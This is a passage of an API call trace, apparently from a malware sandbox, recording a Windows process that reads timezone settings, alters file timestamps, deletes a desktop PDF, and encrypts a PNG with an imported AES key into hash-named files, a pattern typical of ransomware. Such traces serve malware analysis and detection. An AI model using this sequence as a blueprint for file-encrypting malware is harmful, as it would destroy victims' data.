lpType=0x1bf5d4d8*=0x4, lpData=0x1bf5d4b8*=0x7d8, lpcbData=0x1bf5d4d0*=0x4) returned 0x0 [0068.463] RegQueryValueExW (in: hKey=0x408, lpValueName="2007", lpReserved=0x0, lpType=0x1bf5d4d8, lpData=0x0, lpcbData=0x1bf5d4d0*=0x0 | out: lpType=0x1bf5d4d8*=0x3, lpData=0x0, lpcbData=0x1bf5d4d0*=0x2c) returned 0x0 [0068.463] RegQueryValueExW (in: hKey=0x408, lpValueName="2007", lpReserved=0x0, lpType=0x1bf5d4d8, lpData=0x227eba0, lpcbData=0x1bf5d4d0*=0x2c | out: lpType=0x1bf5d4d8*=0x3, lpData=0x227eba0*, lpcbData=0x1bf5d4d0*=0x2c) returned 0x0 [0068.463] RegQueryValueExW (in: hKey=0x408, lpValueName="2008", lpReserved=0x0, lpType=0x1bf5d4d8, lpData=0x0, lpcbData=0x1bf5d4d0*=0x0 | out: lpType=0x1bf5d4d8*=0x3, lpData=0x0, lpcbData=0x1bf5d4d0*=0x2c) returned 0x0 [0068.463] RegQueryValueExW (in: hKey=0x408, lpValueName="2008", lpReserved=0x0, lpType=0x1bf5d4d8, lpData=0x227ecf0, lpcbData=0x1bf5d4d0*=0x2c | out: lpType=0x1bf5d4d8*=0x3, lpData=0x227ecf0*, lpcbData=0x1bf5d4d0*=0x2c) returned 0x0 [0068.464] RegCloseKey (hKey=0x408) returned 0x0 [0068.464] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x1bf5d668, lpData=0x0, lpcbData=0x1bf5d660*=0x0 | out: lpType=0x1bf5d668*=0x1, lpData=0x0, lpcbData=0x1bf5d660*=0x20) returned 0x0 [0068.464] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Display", lpReserved=0x0, lpType=0x1bf5d668, lpData=0x227eec0, lpcbData=0x1bf5d660*=0x20 | out: lpType=0x1bf5d668*=0x1, lpData="@tzres.dll,-670", lpcbData=0x1bf5d660*=0x20) returned 0x0 [0068.464] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x1bf5d668, lpData=0x0, lpcbData=0x1bf5d660*=0x0 | out: lpType=0x1bf5d668*=0x1, lpData=0x0, lpcbData=0x1bf5d660*=0x20) returned 0x0 [0068.464] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Std", lpReserved=0x0, lpType=0x1bf5d668, lpData=0x227ef30, lpcbData=0x1bf5d660*=0x20 | out: lpType=0x1bf5d668*=0x1, lpData="@tzres.dll,-672", lpcbData=0x1bf5d660*=0x20) returned 0x0 [0068.464] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x1bf5d668, lpData=0x0, lpcbData=0x1bf5d660*=0x0 | out: lpType=0x1bf5d668*=0x1, lpData=0x0, lpcbData=0x1bf5d660*=0x20) returned 0x0 [0068.465] RegQueryValueExW (in: hKey=0x3d4, lpValueName="MUI_Dlt", lpReserved=0x0, lpType=0x1bf5d668, lpData=0x227efa0, lpcbData=0x1bf5d660*=0x20 | out: lpType=0x1bf5d668*=0x1, lpData="@tzres.dll,-671", lpcbData=0x1bf5d660*=0x20) returned 0x0 [0068.466] CoTaskMemAlloc (cb=0x20c) returned 0x1a6281d0 [0068.466] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x1a6281d0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0068.467] CoTaskMemFree (pv=0x1a6281d0) [0068.468] CoTaskMemAlloc (cb=0x20c) returned 0x1a6281d0 [0068.468] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x1bf5d6b8, pwszFileMUIPath=0x1a6281d0, pcchFileMUIPath=0x1bf5d6c0, pululEnumerator=0x1bf5d6b0 | out: pwszLanguage=0x0, pcchLanguage=0x1bf5d6b8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x1bf5d6c0, pululEnumerator=0x1bf5d6b0) returned 1 [0068.479] CoTaskMemFree (pv=0x0) [0068.479] CoTaskMemFree (pv=0x1a6281d0) [0068.479] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x510001 [0068.533] CoTaskMemAlloc (cb=0x3ec) returned 0x1a62daa0 [0068.533] LoadStringW (in: hInstance=0x510001, uID=0x29e, lpBuffer=0x1a62daa0, cchBufferMax=500 | out: lpBuffer="(UTC+10:00) Canberra, Melbourne, Sydney") returned 0x27 [0068.534] CoTaskMemFree (pv=0x1a62daa0) [0068.534] FreeLibrary (hLibModule=0x510001) returned 1 [0068.534] CoTaskMemAlloc (cb=0x20c) returned 0x1a6281d0 [0068.534] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x1a6281d0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0068.534] CoTaskMemFree (pv=0x1a6281d0) [0068.534] CoTaskMemAlloc (cb=0x20c) returned 0x1a6281d0 [0068.534] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x1bf5d6b8, pwszFileMUIPath=0x1a6281d0, pcchFileMUIPath=0x1bf5d6c0, pululEnumerator=0x1bf5d6b0 | out: pwszLanguage=0x0, pcchLanguage=0x1bf5d6b8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x1bf5d6c0, pululEnumerator=0x1bf5d6b0) returned 1 [0068.535] CoTaskMemFree (pv=0x0) [0068.535] CoTaskMemFree (pv=0x1a6281d0) [0068.535] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x510001 [0068.536] CoTaskMemAlloc (cb=0x3ec) returned 0x1a62daa0 [0068.536] LoadStringW (in: hInstance=0x510001, uID=0x2a0, lpBuffer=0x1a62daa0, cchBufferMax=500 | out: lpBuffer="AUS Eastern Standard Time") returned 0x19 [0068.536] CoTaskMemFree (pv=0x1a62daa0) [0068.536] FreeLibrary (hLibModule=0x510001) returned 1 [0068.536] CoTaskMemAlloc (cb=0x20c) returned 0x1a6281d0 [0068.536] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x1a6281d0 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0068.536] CoTaskMemFree (pv=0x1a6281d0) [0068.536] CoTaskMemAlloc (cb=0x20c) returned 0x1a6281d0 [0068.536] GetFileMUIPath (in: dwFlags=0x10, pcwszFilePath="C:\\Windows\\system32\\tzres.dll", pwszLanguage=0x0, pcchLanguage=0x1bf5d6b8, pwszFileMUIPath=0x1a6281d0, pcchFileMUIPath=0x1bf5d6c0, pululEnumerator=0x1bf5d6b0 | out: pwszLanguage=0x0, pcchLanguage=0x1bf5d6b8, pwszFileMUIPath="C:\\Windows\\system32\\en-US\\tzres.dll.mui", pcchFileMUIPath=0x1bf5d6c0, pululEnumerator=0x1bf5d6b0) returned 1 [0068.537] CoTaskMemFree (pv=0x0) [0068.537] CoTaskMemFree (pv=0x1a6281d0) [0068.537] LoadLibraryExW (lpLibFileName="C:\\Windows\\system32\\en-US\\tzres.dll.mui", hFile=0x0, dwFlags=0x2) returned 0x510001 [0068.538] CoTaskMemAlloc (cb=0x3ec) returned 0x1a62daa0 [0068.538] LoadStringW (in: hInstance=0x510001, uID=0x29f, lpBuffer=0x1a62daa0, cchBufferMax=500 | out: lpBuffer="AUS Eastern Daylight Time") returned 0x19 [0068.538] CoTaskMemFree (pv=0x1a62daa0) [0068.538] FreeLibrary (hLibModule=0x510001) returned 1 [0068.539] RegCloseKey (hKey=0x3d4) returned 0x0 [0068.540] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0068.540] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0068.540] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\37rhcqshuc_h.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0068.540] GetFileType (hFile=0x3d4) returned 0x1 [0068.540] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0068.540] GetFileType (hFile=0x3d4) returned 0x1 [0068.541] SetFileTime (hFile=0x3d4, lpCreationTime=0x1bf5db78, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0068.541] CloseHandle (hObject=0x3d4) returned 1 [0068.541] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0068.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0068.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\37rhcqshuc_h.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0068.541] GetFileType (hFile=0x3d4) returned 0x1 [0068.541] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0068.541] GetFileType (hFile=0x3d4) returned 0x1 [0068.541] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x1bf5db78, lpLastWriteTime=0x0) returned 1 [0068.541] CloseHandle (hObject=0x3d4) returned 1 [0068.541] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d430, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0068.541] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d910) returned 1 [0068.541] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\37rhcqshuc_h.pdf"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0068.542] GetFileType (hFile=0x3d4) returned 0x1 [0068.542] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d880) returned 1 [0068.542] GetFileType (hFile=0x3d4) returned 0x1 [0068.542] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5db78) returned 1 [0068.542] CloseHandle (hObject=0x3d4) returned 1 [0068.542] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d630, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0068.542] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\37rhcqshuc_h.pdf")) returned 1 [0068.543] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\37RHCQSHUC_h.pdf", lpFilePart=0x0) returned 0x36 [0068.548] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239", lpFilePart=0x0) returned 0x46 [0068.548] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0068.548] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aa6820e9d387091bff495dbb3094f239"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0068.548] GetFileType (hFile=0x3d4) returned 0x1 [0068.548] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0068.548] GetFileType (hFile=0x3d4) returned 0x1 [0068.548] SetFileTime (hFile=0x3d4, lpCreationTime=0x1bf5dc18, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0068.548] CloseHandle (hObject=0x3d4) returned 1 [0068.548] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239", lpFilePart=0x0) returned 0x46 [0068.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0068.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aa6820e9d387091bff495dbb3094f239"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0068.549] GetFileType (hFile=0x3d4) returned 0x1 [0068.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0068.549] GetFileType (hFile=0x3d4) returned 0x1 [0068.549] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x1bf5dc18, lpLastWriteTime=0x0) returned 1 [0068.549] CloseHandle (hObject=0x3d4) returned 1 [0068.549] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239", nBufferLength=0x105, lpBuffer=0x1bf5d4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239", lpFilePart=0x0) returned 0x46 [0068.549] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d9b0) returned 1 [0068.549] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\AA6820E9D387091BFF495DBB3094F239" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\aa6820e9d387091bff495dbb3094f239"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0068.549] GetFileType (hFile=0x3d4) returned 0x1 [0068.549] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d920) returned 1 [0068.549] GetFileType (hFile=0x3d4) returned 0x1 [0068.549] SetFileTime (hFile=0x3d4, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5dc18) returned 1 [0068.550] CloseHandle (hObject=0x3d4) returned 1 [0068.550] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0068.551] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0068.552] CryptAcquireContextW (in: phProv=0x1bf5da68, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x1bf5da68*=0x1a5b7510) returned 1 [0068.552] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x2284c90, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5da20 | out: phKey=0x1bf5da20*=0x1a6269f0) returned 1 [0068.552] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0068.552] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x0, pdwDataLen=0x1bf5db30 | out: pbData=0x0*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0068.553] CryptExportKey (in: hKey=0x1a6269f0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2284d80, pdwDataLen=0x1bf5db30 | out: pbData=0x2284d80*, pdwDataLen=0x1bf5db30*=0x1c) returned 1 [0068.553] CryptImportKey (in: hProv=0x1a5b7510, pbData=0x2284ea0, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d9f0 | out: phKey=0x1bf5d9f0*=0x1a626a60) returned 1 [0068.553] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0068.553] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0068.553] CryptDuplicateKey (in: hKey=0x1a626a60, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d9e0 | out: phKey=0x1bf5d9e0*=0x1a626ad0) returned 1 [0068.553] CryptContextAddRef (hProv=0x1a5b7510, pdwReserved=0x0, dwFlags=0x0) returned 1 [0068.553] CryptSetKeyParam (hKey=0x1a626ad0, dwParam=0x4, pbData=0x2284fe8*=0x1, dwFlags=0x0) returned 1 [0068.553] CryptSetKeyParam (hKey=0x1a626ad0, dwParam=0x1, pbData=0x2284f98, dwFlags=0x0) returned 1 [0068.553] CryptDestroyKey (hKey=0x1a626a60) returned 1 [0068.553] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0068.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png", lpFilePart=0x0) returned 0x30 [0068.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0068.553] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\6N8dDZ.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\6n8ddz.png"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0068.553] GetFileType (hFile=0x3d4) returned 0x1 [0068.553] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0068.553] GetFileType (hFile=0x3d4) returned 0x1 [0068.553] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427", nBufferLength=0x105, lpBuffer=0x1bf5d450, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427", lpFilePart=0x0) returned 0x46 [0068.553] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d930) returned 1 [0068.554] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e36554ecb702fe1a0512e69d1ad6d427"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x40c [0068.554] GetFileType (hFile=0x40c) returned 0x1 [0068.554] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8a0) returned 1 [0068.554] GetFileType (hFile=0x40c) returned 0x1 [0068.555] ReadFile (in: hFile=0x3d4, lpBuffer=0x2285380, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2285380*, lpNumberOfBytesRead=0x1bf5da28*=0x7547, lpOverlapped=0x0) returned 1 [0068.556] CryptEncrypt (in: hKey=0x1a626ad0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2299398*, pdwDataLen=0x1bf5da80*=0x7540, dwBufLen=0x7540 | out: pbData=0x2299398*, pdwDataLen=0x1bf5da80*=0x7540) returned 1 [0068.557] WriteFile (in: hFile=0x40c, lpBuffer=0x2299398*, nNumberOfBytesToWrite=0x7540, lpNumberOfBytesWritten=0x1bf5da18, lpOverlapped=0x0 | out: lpBuffer=0x2299398*, lpNumberOfBytesWritten=0x1bf5da18*=0x7540, lpOverlapped=0x0) returned 1 [0068.558] ReadFile (in: hFile=0x3d4, lpBuffer=0x2285380, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5da28, lpOverlapped=0x0 | out: lpBuffer=0x2285380*, lpNumberOfBytesRead=0x1bf5da28*=0x0, lpOverlapped=0x0) returned 1 [0068.558] CryptEncrypt (in: hKey=0x1a626ad0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x22a0918*, pdwDataLen=0x1bf5d9c0*=0x10, dwBufLen=0x10 | out: pbData=0x22a0918*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0068.558] CryptEncrypt (in: hKey=0x1a626ad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x22a0968*, pdwDataLen=0x1bf5d9c0*=0x0, dwBufLen=0x10 | out: pbData=0x22a0968*, pdwDataLen=0x1bf5d9c0*=0x10) returned 1 [0068.558] WriteFile (in: hFile=0x40c, lpBuffer=0x22a09b8*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d948, lpOverlapped=0x0 | out: lpBuffer=0x22a09b8*, lpNumberOfBytesWritten=0x1bf5d948*=0x10, lpOverlapped=0x0) returned 1 [0068.559] CloseHandle (hObject=0x40c) returned 1 [0068.560] CloseHandle (hObject=0x3d4) returned 1 [0068.560] CryptDestroyKey (hKey=0x1a6269f0) returned 1 [0068.560] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0068.560] CryptReleaseContext (hProv=0x1a5b7510, dwFlags=0x0) returned 1 [0068.560] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427", nBufferLength=0x105, lpBuffer=0x1bf5d480, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427", lpFilePart=0x0) returned 0x46 [0068.560] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d960) returned 1 [0068.560] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e36554ecb702fe1a0512e69d1ad6d427"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0068.560] GetFileType (hFile=0x3d4) returned 0x1 [0068.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d8d0) returned 1 [0068.560] GetFileType (hFile=0x3d4) returned 0x1 [0068.560] ReadFile (in: hFile=0x3d4, lpBuffer=0x22a20a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22a20a8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0068.562] ReadFile (in: hFile=0x3d4, lpBuffer=0x22a20a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22a20a8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0068.563] ReadFile (in: hFile=0x3d4, lpBuffer=0x22a20a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22a20a8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0068.564] ReadFile (in: hFile=0x3d4, lpBuffer=0x22a20a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22a20a8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0068.565] ReadFile (in: hFile=0x3d4, lpBuffer=0x22a20a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22a20a8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0068.565] ReadFile (in: hFile=0x3d4, lpBuffer=0x22a20a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22a20a8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0068.565] ReadFile (in: hFile=0x3d4, lpBuffer=0x22a20a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22a20a8*, lpNumberOfBytesRead=0x1bf5da48*=0x1000, lpOverlapped=0x0) returned 1 [0068.565] ReadFile (in: hFile=0x3d4, lpBuffer=0x22a20a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22a20a8*, lpNumberOfBytesRead=0x1bf5da48*=0x550, lpOverlapped=0x0) returned 1 [0068.565] ReadFile (in: hFile=0x3d4, lpBuffer=0x22a20a8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5da48, lpOverlapped=0x0 | out: lpBuffer=0x22a20a8*, lpNumberOfBytesRead=0x1bf5da48*=0x0, lpOverlapped=0x0) returned 1 [0068.565] CloseHandle (hObject=0x3d4) returned 1 [0068.567] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427.info", nBufferLength=0x105, lpBuffer=0x1bf5d200, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427.info", lpFilePart=0x0) returned 0x4b [0068.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d6e0) returned 1 [0068.568] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\E36554ECB702FE1A0512E69D1AD6D427.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\e36554ecb702fe1a0512e69d1ad6d427.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3d4 [0069.536] GetFileType (hFile=0x3d4) returned 0x1 [0069.536] SetThreadErrorMode 